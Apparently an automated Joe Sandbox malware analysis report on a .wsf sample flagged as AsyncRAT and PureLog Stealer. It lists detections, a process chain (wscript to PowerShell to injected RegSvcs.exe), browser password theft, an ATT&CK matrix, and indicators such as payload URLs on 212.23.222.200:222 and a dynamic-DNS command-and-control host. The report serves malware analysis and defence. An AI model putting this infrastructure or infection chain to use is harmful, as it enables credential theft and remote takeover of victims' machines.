              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Yara detected AsyncRAT
              Source: Yara matchFile source: 30.2.powershell.exe.2d900422b00.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.powershell.exe.1383ae82fd0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.powershell.exe.2b30f4a3068.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4156, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3816, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7092, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5040, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected BrowserPasswordDump
              Source: Yara matchFile source: 22.2.RegSvcs.exe.3f95168.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.RegSvcs.exe.7230000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.RegSvcs.exe.7230000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.RegSvcs.exe.3f95168.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000016.00000002.4652798052.0000000007230000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.4588985602.0000000003DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 20.2.powershell.exe.13852e70000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.powershell.exe.2b31f7adac0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.powershell.exe.1384aa71a78.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.powershell.exe.2b31f7adac0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.powershell.exe.1384aa71a78.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.powershell.exe.13852e70000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 30.2.powershell.exe.2d9107309c8.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 30.2.powershell.exe.2d9107309c8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000014.00000002.2623732842.0000013852E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.4422702432.000002B31F7AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2558133112.000001384AA71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.3128607934.000002D910608000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

              Remote Access Functionality

              barindex
              Yara detected BrowserPasswordDump
              Source: Yara matchFile source: 22.2.RegSvcs.exe.3f95168.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.RegSvcs.exe.7230000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.RegSvcs.exe.7230000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.RegSvcs.exe.3f95168.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000016.00000002.4652798052.0000000007230000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.4588985602.0000000003DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 20.2.powershell.exe.13852e70000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.powershell.exe.2b31f7adac0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.powershell.exe.1384aa71a78.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.powershell.exe.2b31f7adac0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.powershell.exe.1384aa71a78.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.powershell.exe.13852e70000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 30.2.powershell.exe.2d9107309c8.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 30.2.powershell.exe.2d9107309c8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000014.00000002.2623732842.0000013852E70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.4422702432.000002B31F7AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2558133112.000001384AA71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.3128607934.000002D910608000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information222
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		222
              Scripting              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		1
              File and Directory Discovery              		Remote Services11
              Archive Collected Data              		2
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API              		1
              DLL Side-Loading              		311
              Process Injection              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory23
              System Information Discovery              		Remote Desktop Protocol1
              Data from Local System              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		1
              BITS Jobs              		1
              Scheduled Task/Job              		121
              Obfuscated Files or Information              		Security Account Manager121
              Security Software Discovery              		SMB/Windows Admin SharesData from Network Shared Drive11
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              Scheduled Task/Job              		1
              Scheduled Task/Job              		Login Hook2
              Software Packing              		NTDS1
              Process Discovery              		Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts3
              PowerShell              		Network Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets31
              Virtualization/Sandbox Evasion              		SSHKeylogging113
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Masquerading              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
              Virtualization/Sandbox Evasion              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              BITS Jobs              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
              Process Injection              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1409058 Sample: Summaryform_FXnbLLyKOJ.wsf Startdate: 14/03/2024 Architecture: WINDOWS Score: 100 86 shefonew07.ddns.net 2->86 94 Snort IDS alert for network traffic 2->94 96 Found malware configuration 2->96 98 Malicious sample detected (through community Yara rule) 2->98 102 19 other signatures 2->102 10 wscript.exe 15 2->10         started        15 wscript.exe 1 2->15         started        17 wscript.exe 2->17         started        19 2 other processes 2->19 signatures3 100 Uses dynamic DNS services 86->100 process4 dnsIp5 88 212.23.222.200, 222, 49699, 49703 TMRDE unknown 10->88 84 C:\Users\Public84DKJPlEEYLhKqtGW.xml, ASCII 10->84 dropped 128 System process connects to network (likely due to code injection or exploit) 10->128 130 VBScript performs obfuscated calls to suspicious functions 10->130 132 Wscript starts Powershell (via cmd or directly) 10->132 134 Suspicious execution chain found 10->134 21 powershell.exe 3 35 10->21         started        25 cmd.exe 15->25         started        27 net.exe 15->27         started        29 cmd.exe 17->29         started        31 net.exe 17->31         started        90 127.0.0.1 unknown unknown 19->90 33 cmd.exe 19->33         started        35 net.exe 19->35         started        file6 signatures7 process8 file9 76 C:\Users\Public\solankedoubledigits.bat, DOS 21->76 dropped 78 C:\Users\Public\newrdptry.ps1, ASCII 21->78 dropped 80 C:\Users\Public\nKNmegHQBbmlQMTN.bat, DOS 21->80 dropped 82 2 other malicious files 21->82 dropped 114 Powershell uses Background Intelligent Transfer Service (BITS) 21->114 37 wscript.exe 1 21->37         started        40 conhost.exe 21->40         started        116 Suspicious powershell command line found 25->116 118 Wscript starts Powershell (via cmd or directly) 25->118 42 powershell.exe 25->42         started        44 conhost.exe 25->44         started        46 2 other processes 27->46 48 2 other processes 29->48 50 2 other processes 31->50 52 2 other processes 33->52 54 2 other processes 35->54 signatures10 process11 signatures12 104 Wscript starts Powershell (via cmd or directly) 37->104 106 Windows Scripting host queries suspicious COM object (likely to drop second stage) 37->106 56 cmd.exe 1 37->56         started        59 net.exe 1 37->59         started        108 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 42->108 110 Writes to foreign memory regions 42->110 112 Injects a PE file into a foreign processes 42->112 61 RegSvcs.exe 42->61         started        64 RegSvcs.exe 48->64         started        66 RegSvcs.exe 52->66         started        process13 dnsIp14 120 Suspicious powershell command line found 56->120 122 Wscript starts Powershell (via cmd or directly) 56->122 124 Bypasses PowerShell execution policy 56->124 68 powershell.exe 15 56->68         started        70 conhost.exe 56->70         started        72 conhost.exe 59->72         started        74 net1.exe 1 59->74         started        92 shefonew07.ddns.net 103.195.101.9, 49711, 49712, 49713 RELIABLESITEUS Singapore 61->92 126 Tries to harvest and steal browser information (history, passwords, etc) 61->126 signatures15 process16

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Summaryform_FXnbLLyKOJ.wsf3%ReversingLabs

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://www.microsoft.0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtX0%Avira URL Cloudsafe
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt0%Avira URL Cloudsafe
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg0%Avira URL Cloudsafe
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtf0%Avira URL Cloudsafe
              http://www.microsoft.cRooCerA0%Avira URL Cloudsafe
              http://212.23.222.200:222/0%Avira URL Cloudsafe
              http://212.23.222.200/0%Avira URL Cloudsafe
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt=0%Avira URL Cloudsafe
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtvh0%Avira URL Cloudsafe
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtLMEM0%Avira URL Cloudsafe
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt-0%Avira URL Cloudsafe
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt.h0%Avira URL Cloudsafe
              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtC:0%Avira URL Cloudsafe
              http://go.microsoft.c%0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              shefonew07.ddns.net
              		103.195.101.9
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpgtrue
                • Avira URL Cloud: safe
                		unknown
                http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txttrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2234682479.0000016D37FFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2302097710.00000288EA7EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2302097710.00000288EA921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2558133112.000001384AACF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3128607934.000002D910186000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2192080087.0000016D288FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2192080087.0000016D28DE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2192080087.0000016D28E0F000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtXwscript.exe, 00000000.00000003.2073944841.00000230DD08F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://www.microsoft.cRooCerApowershell.exe, 00000026.00000002.4487918379.000002B32711F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtfwscript.exe, 00000000.00000003.2073944841.00000230DD08F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2192080087.0000016D28593000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://go.micropowershell.exe, 00000003.00000002.2192080087.0000016D29A0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2236404670.00000288DB39D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://212.23.222.200/wscript.exe, 00000000.00000003.2073944841.00000230DD075000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000003.00000002.2192080087.0000016D28E0F000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://212.23.222.200:222/svchost.exe, 00000005.00000002.3363633322.000001B3F889D000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000005.00000003.2102025199.000001B3F86C0000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drfalse
                            		high
                            http://www.microsoft.powershell.exe, 00000026.00000002.4487918379.000002B32711F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtvhwscript.exe, 00000000.00000002.2260569508.00000230DCFF8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt=wscript.exe, 00000000.00000003.2074008189.00000230DD030000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://g.live.com/odclientsettings/Prod1C:edb.log.5.drfalse
                                		high
                                http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtLMEMwscript.exe, 00000000.00000003.2074008189.00000230DD030000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2192080087.0000016D28593000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://contoso.com/powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2234682479.0000016D37FFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2302097710.00000288EA7EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2302097710.00000288EA921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2558133112.000001384AACF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3128607934.000002D910186000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.4422702432.000002B31F321000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt.hwscript.exe, 00000000.00000002.2260569508.00000230DCFF8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txtC:wscript.exe, 00000000.00000003.2073944841.00000230DD075000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://212.23.222.200:222/DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt-wscript.exe, 00000000.00000003.2075147627.00000230DEE06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2261063964.00000230DEE06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075013439.00000230DEDC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2074969549.00000230DEDBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2073866186.00000230DEDC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2259363764.00000230DEE06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075056628.00000230DEDF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://aka.ms/pscore68powershell.exe, 00000003.00000002.2192080087.0000016D27F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2236404670.00000288DA771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2326561613.000001383AA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2739422188.000002D900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3969619854.000002B30F081000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://go.microsoft.c%RegSvcs.exe, 0000001F.00000002.2797263415.0000000000E02000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2192080087.0000016D27F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2236404670.00000288DA771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2326561613.000001383AA61000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2739422188.000002D900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.3969619854.000002B30F081000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        103.195.101.9
                                        		shefonew07.ddns.netSingapore
                                        		23470RELIABLESITEUStrue
                                        212.23.222.200
                                        		unknownunknown
                                        		12329TMRDEtrue

                                        Private

                                        IP
                                        127.0.0.1

                                        General Information

                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1409058
                                        Start date and time:2024-03-14 16:34:00 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 11m 22s
